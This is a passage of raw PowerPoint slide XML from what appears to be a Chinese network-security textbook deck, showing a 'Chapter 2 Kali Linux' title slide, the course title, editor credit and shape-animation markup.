              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>章</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>Kali Linux</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="等腰三角形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="10384747" y="2655849"/>
            <a:ext cx="2069408" cy="1546303"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="等腰三角形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="-436508" y="2327919"/>
            <a:ext cx="3458403" cy="2584187"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="47928" y="2883669"/>
            <a:ext cx="1612900" cy="1568450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="9600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>02</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="9600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>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6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>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7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="20" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="25" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="26" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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bldLvl="0" animBg="1"/>
      <p:bldP spid="3" grpId="0"/>
      <p:bldP spid="6" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="7" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="8" grpId="0"/>
    </p:bldLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide1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图片 7" descr="V-136038-F72FEC97O"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1">
            <a:alphaModFix amt="10000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="159385" y="-137795"/>
            <a:ext cx="12192000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1" descr="D:\用户目录\Desktop\223.png223"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="216535" y="1415415"/>
            <a:ext cx="6368415" cy="4027805"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5576570" y="1704340"/>
            <a:ext cx="4876800" cy="1009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86694" tIns="43347" rIns="86694" bIns="43347">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="dist">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="6000" b="1" cap="all" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:srgbClr val="007BD3"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="034373"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin scaled="0"/>
                </a:gradFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>网络安全技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="6000" b="1" cap="all" dirty="0">
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="007BD3"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="034373"/>
                  </a:gs>
                </a:gsLst>
                <a:lin scaled="0"/>
              </a:gradFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="直接连接符 19"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5634990" y="2847975"/>
            <a:ext cx="4752340" cy="3810"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="0070C0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="451485"/>
            <a:ext cx="4021455" cy="301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86694" tIns="43347" rIns="86694" bIns="43347">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" cap="all" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>广东省首批十四五规划教材</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" cap="all" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4624705" y="5731510"/>
            <a:ext cx="2943225" cy="590550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6736715" y="4239895"/>
            <a:ext cx="2548255" cy="56007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86694" tIns="43347" rIns="86694" bIns="43347">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" cap="all" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>主编：张燕燕</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2800" cap="all" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5238115" y="3315970"/>
            <a:ext cx="5756910" cy="3219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86694" tIns="43347" rIns="86694" bIns="43347">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
